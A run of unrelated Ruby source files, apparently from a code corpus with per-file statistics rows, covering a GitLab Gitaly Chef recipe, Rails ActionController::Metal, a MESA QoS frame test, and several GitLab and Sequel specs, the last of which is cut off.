account_helper = AccountHelper.new(node)
working_dir = node['gitaly']['dir']
log_directory = node['gitaly']['log_directory']
env_directory = node['gitaly']['env_directory']
config_path = File.join(working_dir, "config.toml")
gitaly_path = node['gitaly']['bin_path']
wrapper_path = "#{gitaly_path}-wrapper"
pid_file = File.join(working_dir, "gitaly.pid")
json_logging = node['gitaly']['logging_format'].eql?('json')
directory working_dir do
owner account_helper.gitlab_user
mode '0700'
recursive true
end
directory log_directory do
owner account_helper.gitlab_user
mode '0700'
recursive true
end
# Doing this in attributes/default.rb will need gitlab cookbook to be loaded
# before gitaly cookbook. This means gitaly cookbook has to depend on gitlab
# cookbook. Since gitlab cookbook already depends on gitaly cookbook, this
# causes a circular dependency. To avoid it, the default value is set in the
# recipe itself.
node.default['gitaly']['env'] = {
'HOME' => node['gitlab']['user']['home'],
'PATH' => "#{node['package']['install-dir']}/bin:#{node['package']['install-dir']}/embedded/bin:/bin:/usr/bin",
'TZ' => ':/etc/localtime',
# This is needed by gitlab-markup to import Python docutils
'PYTHONPATH' => "#{node['package']['install-dir']}/embedded/lib/python3.7/site-packages",
# Charlock Holmes and libicu will report U_FILE_ACCESS_ERROR if this is not set to the right path
# See https://gitlab.com/gitlab-org/gitlab-ce/issues/17415#note_13868167
'ICU_DATA' => "#{node['package']['install-dir']}/embedded/share/icu/current",
'SSL_CERT_DIR' => "#{node['package']['install-dir']}/embedded/ssl/certs/",
# wrapper script parameters
'GITALY_PID_FILE' => pid_file,
'WRAPPER_JSON_LOGGING' => json_logging.to_s
}
env_dir env_directory do
variables node['gitaly']['env']
notifies :restart, "service[gitaly]"
end
template "Create Gitaly config.toml" do
path config_path
source "gitaly-config.toml.erb"
owner "root"
group account_helper.gitlab_group
mode "0640"
variables node['gitaly'].to_hash
notifies :hup, "runit_service[gitaly]"
end
runit_service 'gitaly' do
down node['gitaly']['ha']
options({
user: account_helper.gitlab_user,
groupname: account_helper.gitlab_group,
working_dir: working_dir,
env_dir: env_directory,
bin_path: gitaly_path,
wrapper_path: wrapper_path,
config_path: config_path,
log_directory: log_directory,
json_logging: json_logging
}.merge(params))
log_options node['gitlab']['logging'].to_hash.merge(node['gitaly'].to_hash)
end
if node['gitlab']['bootstrap']['enable']
execute "/opt/gitlab/bin/gitlab-ctl start gitaly" do
retries 20
end
end
file File.join(working_dir, "VERSION") do
content VersionHelper.version("/opt/gitlab/embedded/bin/gitaly --version")
notifies :hup, "runit_service[gitaly]"
end
if node['consul']['enable'] && node['consul']['monitoring_service_discovery']
consul_service 'gitaly' do
socket_address node['gitaly']['prometheus_listen_addr']
end
end
| 34.17757 | 113 | 0.732568 |
87e9255d49e07010ce3f01cf9af90f9e9e02f41e | 184 | # frozen_string_literal: true
# encoding: utf-8
class Role
include Mongoid::Document
field :name, type: String
belongs_to :user
belongs_to :post
recursively_embeds_many
end
| 16.727273 | 29 | 0.766304 |
f8f9975ae6641abcea6af41deadc3f06324420fb | 7,411 | #!/usr/bin/env ruby
# Copyright (c) 2004-2020 Microchip Technology Inc. and its subsidiaries.
# SPDX-License-Identifier: MIT
require_relative 'libeasy/et'
$ts = get_test_setup("mesa_pc_b2b_4x")
cap_check_exit("QOS_INGRESS_MAP_CNT")
#---------- Configuration -----------------------------------------------------
$idx_tx = 0
$idx_rx = 1
$vid_a = 10
test "conf" do
t_i("C-ports")
$ts.dut.port_list.each do |port|
conf = $ts.dut.call("mesa_vlan_port_conf_get", port)
conf["port_type"] = "MESA_VLAN_PORT_TYPE_C"
$ts.dut.call("mesa_vlan_port_conf_set", port, conf)
end
t_i("Include both ports in VLAN")
port_list = port_idx_list_str([$idx_tx, $idx_rx])
$ts.dut.call("mesa_vlan_port_members_set", 1, port_list)
$ts.dut.call("mesa_vlan_port_members_set", $vid_a, port_list)
end
#---------- Frame testing -----------------------------------------------------
# Each entry in the test table has these items:
# 1: Text string printed during test
# 2: Switch Rx port configuration values
# 3: Switch Tx port configuration values
# 3: Host Tx frame values
# 4: Host Rx frame values expected
$test_table =
[
{
txt: "rx pcp to pcp",
rx_cfg: {id: 1, key: "PCP", pcp: 7, "pcp" => 5},
tx_cfg: {},
tx_frm: {pcp: 7}, # Mapped to PCP = 5
rx_frm: {pcp: 5} # Classified value
},
{
txt: "rx pcp to dei",
rx_cfg: {id: 2, key: "PCP", pcp: 6, "dei" => 1},
tx_cfg: {},
tx_frm: {pcp: 6}, # Mapped to DEI = 1
rx_frm: {dei: 1} # Classified value
},
{
txt: "rx dscp to dscp",
rx_cfg: {id: 3, key: "DSCP", dscp: 39, "dscp" => 40},
tx_cfg: {emode: "REMARK"},
tx_frm: {tpid: 0, dscp: 39}, # Mapped to DSCP = 40
rx_frm: {dscp: 40} # Classified value
},
{
txt: "rx pcp to cos",
rx_cfg: {id: 4, key: "PCP", pcp: 7, "cos" => 4},
tx_cfg: {mode: "MAPPED"},
tx_frm: {pcp: 7}, # Mapped to (COS, DPL) = (4, 0)
rx_frm: {pcp: 4} # Mapped using port egress mapping
},
{
txt: "rx pcp_dei to dpl",
rx_cfg: {id: 5, key: "PCP_DEI", pcp: 4, dei: 0, "dpl" => 1},
tx_cfg: {mode: "MAPPED"},
tx_frm: {pcp: 4, dei: 0}, # Mapped to (COS, DPL) = (0, 1)
rx_frm: {pcp: 1, dei: 1} # Mapped using port egress mapping
},
{
txt: "rx pcp to cosid/tx cosid to dscp",
rx_cfg: {id: 6, key: "PCP", pcp: 5, "cosid" => 6},
tx_cfg: {id: 7, key: "COSID", cosid: 6, "dscp" => 21},
tx_frm: {pcp: 5, dscp: 0}, # Mapped to COSID = 6
rx_frm: {dscp: 21} # Mapped from COSID
},
{
txt: "rx pcp to cosid_dpl/tx cosid_dpl to dscp",
rx_cfg: {id: 8, key: "PCP", pcp: 4, "cosid" => 5, "dpl" => 1},
tx_cfg: {id: 9, key: "COSID_DPL", cosid: 5, dpl: 1, "dscp" => 22},
tx_frm: {pcp: 4, dscp: 0}, # Mapped to (COSID, DPL) = (5, 1)
rx_frm: {dscp: 22} # Mapped from (COSID, DPL)
},
{
txt: "rx dscp to dscp/tx dscp to dscp",
rx_cfg: {id: 10, key: "DSCP", dscp: 42, "dscp" => 43, "dpl" => 1},
tx_cfg: {id: 11, key: "DSCP", dscp: 43, "dscp" => 44},
tx_frm: {dscp: 42}, # Mapped to DSCP = 43
rx_frm: {dscp: 44} # Mapped from DSCP
},
{
txt: "rx pcp to dscp_dpl/tx dscp_dpl to pcp",
rx_cfg: {id: 12, key: "PCP", pcp: 4, "dscp" => 45, "dpl" => 3},
tx_cfg: {id: 13, key: "DSCP_DPL", dscp: 45, dpl: 3, "pcp" => 5},
tx_frm: {pcp: 4, dscp: 0}, # Mapped to (DSCP, DPL) = (45, 3)
rx_frm: {pcp: 5, dscp: 0} # Mapped from (DSCP, DPL)
},
]
def frame_fld_get(tx_fld, hdr, fld)
if (hdr.key?(fld))
tx_fld = hdr[fld]
end
tx_fld
end
def map_set(map, values, cfg)
["cos", "dpl", "cosid", "pcp", "dei", "dscp"].each do |k|
if (cfg.key?k)
map["action"][k] = true
values[k] = cfg[k]
end
end
end
test "frame-io" do
$test_table.each do |t|
t_i("Conf '#{t[:txt]}'")
# Ingress port
cfg = t[:rx_cfg]
port = $ts.dut.port_list[$idx_tx]
conf = $ts.dut.call("mesa_qos_port_conf_get", port)
conf["ingress_map"] = ((cfg.key?:id) ? cfg[:id] : 0xfff)
$ts.dut.call("mesa_qos_port_conf_set", port, conf)
# Ingress map
if (cfg.key?:key)
map = $ts.dut.call("mesa_qos_ingress_map_init", "MESA_QOS_INGRESS_MAP_KEY_" + cfg[:key])
map["id"] = cfg[:id]
maps = map["maps"]
case (cfg[:key])
when "PCP"
values = maps["pcp"][cfg[:pcp]]
when "PCP_DEI"
values = maps["pcp_dei"][cfg[:pcp]][cfg[:dei]]
when "DSCP"
values = maps["dscp"][cfg[:dscp]]
when "DSCP_PCP_DEI"
if (cfg.key?:dscp)
values = maps["dpd"][cfg[:dscp]]
else
values = maps["dpd"][cfg[:pcp]][cfg[:dei]]
end
end
map_set(map, values, cfg)
$ts.dut.call("mesa_qos_ingress_map_add", map)
end
# Egress port
cfg = t[:tx_cfg]
port = $ts.dut.port_list[$idx_rx]
conf = $ts.dut.call("mesa_qos_port_conf_get", port)
conf["egress_map"] = ((cfg.key?:id) ? cfg[:id] : 0xfff)
conf["tag"]["remark_mode"] = ("MESA_TAG_REMARK_MODE_" + ((cfg.key?:mode) ? cfg[:mode] : "CLASSIFIED"))
conf["dscp"]["emode"] = ("MESA_DSCP_EMODE_" + ((cfg.key?:emode) ? cfg[:emode] : "DISABLE"))
$ts.dut.call("mesa_qos_port_conf_set", port, conf)
# Egress map
if (cfg.key?:key)
map = $ts.dut.call("mesa_qos_egress_map_init", "MESA_QOS_EGRESS_MAP_KEY_" + cfg[:key])
map["id"] = cfg[:id]
maps = map["maps"]
case (cfg[:key])
when "COSID"
values = maps["cosid"][cfg[:cosid]]
when "COSID_DPL"
values = maps["cosid_dpl"][cfg[:cosid]][cfg[:dpl]]
when "DSCP"
values = maps["dscp"][cfg[:dscp]]
when "DSCP_DPL"
values = maps["dscp_dpl"][cfg[:dscp]][cfg[:dpl]]
end
map_set(map, values, cfg)
$ts.dut.call("mesa_qos_egress_map_add", map)
end
# Frame test
f_base = " eth"
f_end = " data pattern cnt 64"
f = t[:tx_frm]
tag = {}
tag[:tpid] = ((f.key?:tpid) ? f[:tpid] : 0x8100)
tag[:vid] = $vid_a
tag[:pcp] = ((f.key?:pcp) ? f[:pcp] : 0)
tag[:dei] = ((f.key?:dei) ? f[:dei] : 0)
cmd = "sudo ef name f1"
cmd += f_base
cmd += cmd_tag_push(tag)
if (f.key?:dscp)
cmd += " ipv4 dscp #{f[:dscp]}"
end
cmd += f_end
cmd += " name f2"
cmd += f_base
f = t[:rx_frm]
tag[:pcp] = ((f.key?:pcp) ? f[:pcp] : tag[:pcp])
tag[:dei] = ((f.key?:dei) ? f[:dei] : tag[:dei])
cmd += cmd_tag_push(tag)
if (f.key?:dscp)
cmd += " ipv4 dscp #{f[:dscp]}"
end
cmd += f_end
cmd += " tx #{$ts.pc.p[$idx_tx]} name f1"
cmd += " rx #{$ts.pc.p[$idx_rx]} name f2"
t_i("Test '#{t[:txt]}'")
$ts.pc.run(cmd)
end
end
| 33.084821 | 110 | 0.48536 |
33c4caaddcb21cdabf4e8d7a8918296cf81eddbb | 1,406 | # frozen_string_literal: true
module QA
module Page
module Group
module SubMenus
class Members < Page::Base
include Page::Component::UsersSelect
view 'app/views/shared/members/_invite_member.html.haml' do
element :member_select_field
element :invite_member_button
end
view 'app/views/shared/members/_member.html.haml' do
element :member_row
element :access_level_dropdown
element :delete_member_button
element :developer_access_level_link, 'qa_selector: "#{role.downcase}_access_level_link"' # rubocop:disable QA/ElementWithPattern, Lint/InterpolationCheck
end
def add_member(username)
select_user :member_select_field, username
click_element :invite_member_button
end
def update_access_level(username, access_level)
within_element(:member_row, text: username) do
click_element :access_level_dropdown
click_element "#{access_level.downcase}_access_level_link"
end
end
def remove_member(username)
page.accept_confirm do
within_element(:member_row, text: username) do
click_element :delete_member_button
end
end
end
end
end
end
end
end
| 30.565217 | 166 | 0.623755 |
ed93a2f09cddc8882bf27db6985ff9b3f4dfb2bb | 7,512 | require "active_support/core_ext/array/extract_options"
require "action_dispatch/middleware/stack"
require "action_dispatch/http/request"
require "action_dispatch/http/response"
module ActionController
# Extend ActionDispatch middleware stack to make it aware of options
# allowing the following syntax in controllers:
#
# class PostsController < ApplicationController
# use AuthenticationMiddleware, except: [:index, :show]
# end
#
class MiddlewareStack < ActionDispatch::MiddlewareStack #:nodoc:
class Middleware < ActionDispatch::MiddlewareStack::Middleware #:nodoc:
def initialize(klass, args, actions, strategy, block)
@actions = actions
@strategy = strategy
super(klass, args, block)
end
def valid?(action)
@strategy.call @actions, action
end
end
def build(action, app = Proc.new)
action = action.to_s
middlewares.reverse.inject(app) do |a, middleware|
middleware.valid?(action) ? middleware.build(a) : a
end
end
private
INCLUDE = ->(list, action) { list.include? action }
EXCLUDE = ->(list, action) { !list.include? action }
NULL = ->(list, action) { true }
def build_middleware(klass, args, block)
options = args.extract_options!
only = Array(options.delete(:only)).map(&:to_s)
except = Array(options.delete(:except)).map(&:to_s)
args << options unless options.empty?
strategy = NULL
list = nil
if only.any?
strategy = INCLUDE
list = only
elsif except.any?
strategy = EXCLUDE
list = except
end
Middleware.new(klass, args, list, strategy, block)
end
end
# <tt>ActionController::Metal</tt> is the simplest possible controller, providing a
# valid Rack interface without the additional niceties provided by
# <tt>ActionController::Base</tt>.
#
# A sample metal controller might look like this:
#
# class HelloController < ActionController::Metal
# def index
# self.response_body = "Hello World!"
# end
# end
#
# And then to route requests to your metal controller, you would add
# something like this to <tt>config/routes.rb</tt>:
#
# get 'hello', to: HelloController.action(:index)
#
# The +action+ method returns a valid Rack application for the \Rails
# router to dispatch to.
#
# == Rendering Helpers
#
# <tt>ActionController::Metal</tt> by default provides no utilities for rendering
# views, partials, or other responses aside from explicitly calling of
# <tt>response_body=</tt>, <tt>content_type=</tt>, and <tt>status=</tt>. To
# add the render helpers you're used to having in a normal controller, you
# can do the following:
#
# class HelloController < ActionController::Metal
# include AbstractController::Rendering
# include ActionView::Layouts
# append_view_path "#{Rails.root}/app/views"
#
# def index
# render "hello/index"
# end
# end
#
# == Redirection Helpers
#
# To add redirection helpers to your metal controller, do the following:
#
# class HelloController < ActionController::Metal
# include ActionController::Redirecting
# include Rails.application.routes.url_helpers
#
# def index
# redirect_to root_url
# end
# end
#
# == Other Helpers
#
# You can refer to the modules included in <tt>ActionController::Base</tt> to see
# other features you can bring into your metal controller.
#
class Metal < AbstractController::Base
abstract!
def env
@_request.env
end
deprecate :env
# Returns the last part of the controller's name, underscored, without the ending
# <tt>Controller</tt>. For instance, PostsController returns <tt>posts</tt>.
# Namespaces are left out, so Admin::PostsController returns <tt>posts</tt> as well.
#
# ==== Returns
# * <tt>string</tt>
def self.controller_name
@controller_name ||= name.demodulize.sub(/Controller$/, "").underscore
end
def self.make_response!(request)
ActionDispatch::Response.create.tap do |res|
res.request = request
end
end
def self.encoding_for_param(action, param) # :nodoc:
::Encoding::UTF_8
end
# Delegates to the class' <tt>controller_name</tt>
def controller_name
self.class.controller_name
end
attr_internal :response, :request
delegate :session, to: "@_request"
delegate :headers, :status=, :location=, :content_type=,
:status, :location, :content_type, to: "@_response"
def initialize
@_request = nil
@_response = nil
@_routes = nil
super
end
def params
@_params ||= request.parameters
end
def params=(val)
@_params = val
end
alias :response_code :status # :nodoc:
# Basic url_for that can be overridden for more robust functionality.
def url_for(string)
string
end
def response_body=(body)
body = [body] unless body.nil? || body.respond_to?(:each)
response.reset_body!
return unless body
response.body = body
super
end
# Tests if render or redirect has already happened.
def performed?
response_body || response.committed?
end
def dispatch(name, request, response) #:nodoc:
set_request!(request)
set_response!(response)
process(name)
request.commit_flash
to_a
end
def set_response!(response) # :nodoc:
@_response = response
end
def set_request!(request) #:nodoc:
@_request = request
@_request.controller_instance = self
end
def to_a #:nodoc:
response.to_a
end
def reset_session
@_request.reset_session
end
class_attribute :middleware_stack
self.middleware_stack = ActionController::MiddlewareStack.new
def self.inherited(base) # :nodoc:
base.middleware_stack = middleware_stack.dup
super
end
# Pushes the given Rack middleware and its arguments to the bottom of the
# middleware stack.
def self.use(*args, &block)
middleware_stack.use(*args, &block)
end
# Alias for +middleware_stack+.
def self.middleware
middleware_stack
end
# Makes the controller a Rack endpoint that runs the action in the given
# +env+'s +action_dispatch.request.path_parameters+ key.
def self.call(env)
req = ActionDispatch::Request.new env
action(req.path_parameters[:action]).call(env)
end
class << self; deprecate :call; end
# Returns a Rack endpoint for the given action name.
def self.action(name)
if middleware_stack.any?
middleware_stack.build(name) do |env|
req = ActionDispatch::Request.new(env)
res = make_response! req
new.dispatch(name, req, res)
end
else
lambda { |env|
req = ActionDispatch::Request.new(env)
res = make_response! req
new.dispatch(name, req, res)
}
end
end
# Direct dispatch to the controller. Instantiates the controller, then
# executes the action named +name+.
def self.dispatch(name, req, res)
if middleware_stack.any?
middleware_stack.build(name) { |env| new.dispatch(name, req, res) }.call req.env
else
new.dispatch(name, req, res)
end
end
end
end
| 27.719557 | 88 | 0.644569 |
380b86d859317ca983a5f4b6e40e5127eabc9037 | 153 | require "hesburgh_errors/engine"
require "hesburgh_errors/controller_error_trapping"
require "hesburgh_errors/error_trapping"
module HesburghErrors
end
| 21.857143 | 51 | 0.875817 |
e8b236426e907248b41d4c25d52662f7ecf01355 | 1,048 | require 'spec_helper'
describe 'Gitlab::Popen', lib: true, no_db: true do
let(:path) { Rails.root.join('tmp').to_s }
before do
@klass = Class.new(Object)
@klass.send(:include, Gitlab::Popen)
end
context 'zero status' do
before do
@output, @status = @klass.new.popen(%w(ls), path)
end
it { expect(@status).to be_zero }
it { expect(@output).to include('cache') }
end
context 'non-zero status' do
before do
@output, @status = @klass.new.popen(%w(cat NOTHING), path)
end
it { expect(@status).to eq(1) }
it { expect(@output).to include('No such file or directory') }
end
context 'unsafe string command' do
it 'raises an error when it gets called with a string argument' do
expect { @klass.new.popen('ls', path) }.to raise_error(RuntimeError)
end
end
context 'without a directory argument' do
before do
@output, @status = @klass.new.popen(%w(ls))
end
it { expect(@status).to be_zero }
it { expect(@output).to include('spec') }
end
end
| 23.818182 | 74 | 0.628817 |
bbacaab943a80a343445d7b4750e0b53fe985f1e | 249 | newparam(:name) do
include EasyType
include EasyType::Validators::Name
include EasyType::Mungers::Upcase
desc "The role name "
isnamevar
to_translate_to_resource do | raw_resource|
raw_resource.column_data('ROLE').upcase
end
end
| 17.785714 | 45 | 0.751004 |
f86cb6aed149ba36f5c9be9e9f3bb42b6b1bd02b | 2,281 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Mutations::Boards::Issues::IssueMoveList do
let_it_be(:group) { create(:group, :public) }
let_it_be(:project) { create(:project, group: group) }
let_it_be(:board) { create(:board, group: group) }
let_it_be(:epic) { create(:epic, group: group) }
let_it_be(:user) { create(:user) }
let_it_be(:issue1) { create(:labeled_issue, project: project, relative_position: 3) }
let_it_be(:existing_issue1) { create(:labeled_issue, project: project, relative_position: 10) }
let_it_be(:existing_issue2) { create(:labeled_issue, project: project, relative_position: 50) }
let(:mutation) { described_class.new(object: nil, context: { current_user: user }, field: nil) }
let(:params) { { board: board, project_path: project.full_path, iid: issue1.iid } }
let(:move_params) do
{
epic_id: epic.to_global_id,
move_before_id: existing_issue2.id,
move_after_id: existing_issue1.id
}
end
before do
stub_licensed_features(epics: true)
project.add_reporter(user)
end
subject do
mutation.resolve(**params.merge(move_params))
end
describe '#resolve' do
context 'when user has access to the epic' do
before do
group.add_guest(user)
end
it 'moves and repositions issue' do
subject
expect(issue1.reload.epic).to eq(epic)
expect(issue1.relative_position).to be < existing_issue2.relative_position
expect(issue1.relative_position).to be > existing_issue1.relative_position
end
end
context 'when user does not have access to the epic' do
let(:epic) { create(:epic, :confidential, group: group) }
it 'does not update issue' do
subject
expect(issue1.reload.epic).to be_nil
expect(issue1.relative_position).to eq(3)
end
end
context 'when user cannot be assigned to issue' do
before do
stub_licensed_features(board_assignee_lists: true)
end
it 'returns error on result' do
params[:to_list_id] = create(:user_list, board: board, position: 2).id
result = mutation.resolve(**params)
expect(result[:errors]).to eq(['Not authorized to assign issue to list user'])
end
end
end
end
| 30.413333 | 98 | 0.679088 |
08e59be02f3436209eae796630bd9804b9549636 | 25,754 | require File.join(File.dirname(__FILE__), 'spec_helper')
context "DB#create_table" do
setup do
@db = SchemaDummyDatabase.new
end
specify "should accept the table name" do
@db.create_table(:cats) {}
@db.sqls.should == ['CREATE TABLE cats ()']
end
specify "should accept the table name in multiple formats" do
@db.create_table(:cats__cats) {}
@db.create_table("cats__cats1") {}
@db.create_table(:cats__cats2.identifier) {}
@db.create_table(:cats.qualify(:cats3)) {}
@db.sqls.should == ['CREATE TABLE cats.cats ()', 'CREATE TABLE cats__cats1 ()', 'CREATE TABLE cats__cats2 ()', 'CREATE TABLE cats3.cats ()']
end
specify "should raise an error if the table name argument is not valid" do
proc{@db.create_table(1) {}}.should raise_error(Sequel::Error)
proc{@db.create_table(:cats.as(:c)) {}}.should raise_error(Sequel::Error)
end
specify "should accept multiple columns" do
@db.create_table(:cats) do
column :id, :integer
column :name, :text
end
@db.sqls.should == ['CREATE TABLE cats (id integer, name text)']
end
specify "should accept method calls as data types" do
@db.create_table(:cats) do
integer :id
text :name
end
@db.sqls.should == ['CREATE TABLE cats (id integer, name text)']
end
specify "should transform types given as ruby classes to database-specific types" do
@db.create_table(:cats) do
String :a
Integer :b
Fixnum :c
Bignum :d
Float :e
BigDecimal :f
Date :g
DateTime :h
Time :i
Numeric :j
File :k
TrueClass :l
FalseClass :m
column :n, Fixnum
primary_key :o, :type=>String
foreign_key :p, :f, :type=>Date
end
@db.sqls.should == ['CREATE TABLE cats (o varchar(255) PRIMARY KEY AUTOINCREMENT, a varchar(255), b integer, c integer, d bigint, e double precision, f numeric, g date, h timestamp, i timestamp, j numeric, k blob, l boolean, m boolean, n integer, p date REFERENCES f)']
end
specify "should accept primary key definition" do
@db.create_table(:cats) do
primary_key :id
end
@db.sqls.should == ['CREATE TABLE cats (id integer PRIMARY KEY AUTOINCREMENT)']
@db.sqls.clear
@db.create_table(:cats) do
primary_key :id, :serial, :auto_increment => false
end
@db.sqls.should == ['CREATE TABLE cats (id serial PRIMARY KEY)']
@db.sqls.clear
@db.create_table(:cats) do
primary_key :id, :type => :serial, :auto_increment => false
end
@db.sqls.should == ['CREATE TABLE cats (id serial PRIMARY KEY)']
end
specify "should accept and literalize default values" do
@db.create_table(:cats) do
integer :id, :default => 123
text :name, :default => "abc'def"
end
@db.sqls.should == ["CREATE TABLE cats (id integer DEFAULT 123, name text DEFAULT 'abc''def')"]
end
specify "should accept not null definition" do
@db.create_table(:cats) do
integer :id
text :name, :null => false
end
@db.sqls.should == ["CREATE TABLE cats (id integer, name text NOT NULL)"]
end
specify "should accept null definition" do
@db.create_table(:cats) do
integer :id
text :name, :null => true
end
@db.sqls.should == ["CREATE TABLE cats (id integer, name text NULL)"]
end
specify "should accept unique definition" do
@db.create_table(:cats) do
integer :id
text :name, :unique => true
end
@db.sqls.should == ["CREATE TABLE cats (id integer, name text UNIQUE)"]
end
specify "should accept unsigned definition" do
@db.create_table(:cats) do
integer :value, :unsigned => true
end
@db.sqls.should == ["CREATE TABLE cats (value integer UNSIGNED)"]
end
specify "should accept [SET|ENUM](...) types" do
@db.create_table(:cats) do
set :color, :elements => ['black', 'tricolor', 'grey']
end
@db.sqls.should == ["CREATE TABLE cats (color set('black', 'tricolor', 'grey'))"]
end
specify "should accept varchar size" do
@db.create_table(:cats) do
varchar :name
end
@db.sqls.should == ["CREATE TABLE cats (name varchar(255))"]
@db.sqls.clear
@db.create_table(:cats) do
varchar :name, :size => 51
end
@db.sqls.should == ["CREATE TABLE cats (name varchar(51))"]
end
specify "should use double precision for double type" do
@db.create_table(:cats) do
double :name
end
@db.sqls.should == ["CREATE TABLE cats (name double precision)"]
end
specify "should accept foreign keys without options" do
@db.create_table(:cats) do
foreign_key :project_id
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer)"]
end
specify "should accept foreign keys with options" do
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects)"]
end
specify "should accept foreign keys with separate table argument" do
@db.create_table(:cats) do
foreign_key :project_id, :projects, :default=>3
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer DEFAULT 3 REFERENCES projects)"]
end
specify "should raise an error if the table argument to foreign_key isn't a hash, symbol, or nil" do
proc{@db.create_table(:cats){foreign_key :project_id, Object.new, :default=>3}}.should raise_error(Sequel::Error)
end
specify "should accept foreign keys with arbitrary keys" do
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :key => :id
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects(id))"]
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :key => :zzz
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects(zzz))"]
end
specify "should accept foreign keys with ON DELETE clause" do
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :restrict
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE RESTRICT)"]
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :cascade
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE CASCADE)"]
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :no_action
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE NO ACTION)"]
@db.sqls.clear
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :set_null
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE SET NULL)"]
@db.sqls.clear
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :set_default
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE SET DEFAULT)"]
@db.sqls.clear
end
specify "should accept foreign keys with ON UPDATE clause" do
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_update => :restrict
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON UPDATE RESTRICT)"]
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_update => :cascade
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON UPDATE CASCADE)"]
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_update => :no_action
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON UPDATE NO ACTION)"]
@db.sqls.clear
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_update => :set_null
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON UPDATE SET NULL)"]
@db.sqls.clear
@db.sqls.clear
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_update => :set_default
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON UPDATE SET DEFAULT)"]
@db.sqls.clear
end
specify "should accept inline index definition" do
@db.create_table(:cats) do
integer :id, :index => true
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE INDEX cats_id_index ON cats (id)"]
end
specify "should accept inline index definition for foreign keys" do
@db.create_table(:cats) do
foreign_key :project_id, :table => :projects, :on_delete => :cascade, :index => true
end
@db.sqls.should == ["CREATE TABLE cats (project_id integer REFERENCES projects ON DELETE CASCADE)",
"CREATE INDEX cats_project_id_index ON cats (project_id)"]
end
specify "should accept index definitions" do
@db.create_table(:cats) do
integer :id
index :id
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE INDEX cats_id_index ON cats (id)"]
end
specify "should accept unique index definitions" do
@db.create_table(:cats) do
text :name
unique :name
end
@db.sqls.should == ["CREATE TABLE cats (name text, UNIQUE (name))"]
end
specify "should raise on full-text index definitions" do
proc {
@db.create_table(:cats) do
text :name
full_text_index :name
end
}.should raise_error(Sequel::Error)
end
specify "should raise on spatial index definitions" do
proc {
@db.create_table(:cats) do
point :geom
spatial_index :geom
end
}.should raise_error(Sequel::Error)
end
specify "should raise on partial index definitions" do
proc {
@db.create_table(:cats) do
text :name
index :name, :where => {:something => true}
end
}.should raise_error(Sequel::Error)
end
specify "should raise index definitions with type" do
proc {
@db.create_table(:cats) do
text :name
index :name, :type => :hash
end
}.should raise_error(Sequel::Error)
end
specify "should accept multiple index definitions" do
@db.create_table(:cats) do
integer :id
index :id
index :name
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE INDEX cats_id_index ON cats (id)", "CREATE INDEX cats_name_index ON cats (name)"]
end
specify "should accept custom index names" do
@db.create_table(:cats) do
integer :id
index :id, :name => 'abc'
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE INDEX abc ON cats (id)"]
end
specify "should accept unique index definitions" do
@db.create_table(:cats) do
integer :id
index :id, :unique => true
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE UNIQUE INDEX cats_id_index ON cats (id)"]
end
specify "should accept composite index definitions" do
@db.create_table(:cats) do
integer :id
index [:id, :name], :unique => true
end
@db.sqls.should == ["CREATE TABLE cats (id integer)", "CREATE UNIQUE INDEX cats_id_name_index ON cats (id, name)"]
end
specify "should accept unnamed constraint definitions with blocks" do
@db.create_table(:cats) do
integer :score
check {(:x.sql_number > 0) & (:y.sql_number < 1)}
end
@db.sqls.should == ["CREATE TABLE cats (score integer, CHECK ((x > 0) AND (y < 1)))"]
end
specify "should accept unnamed constraint definitions" do
@db.create_table(:cats) do
check 'price < ?', 100
end
@db.sqls.should == ["CREATE TABLE cats (CHECK (price < 100))"]
end
specify "should accept hash constraints" do
@db.create_table(:cats) do
check :price=>100
end
@db.sqls.should == ["CREATE TABLE cats (CHECK (price = 100))"]
end
specify "should accept named constraint definitions" do
@db.create_table(:cats) do
integer :score
constraint :valid_score, 'score <= 100'
end
@db.sqls.should == ["CREATE TABLE cats (score integer, CONSTRAINT valid_score CHECK (score <= 100))"]
end
specify "should accept named constraint definitions with block" do
@db.create_table(:cats) do
constraint(:blah_blah) {(:x.sql_number > 0) & (:y.sql_number < 1)}
end
@db.sqls.should == ["CREATE TABLE cats (CONSTRAINT blah_blah CHECK ((x > 0) AND (y < 1)))"]
end
specify "should accept composite primary keys" do
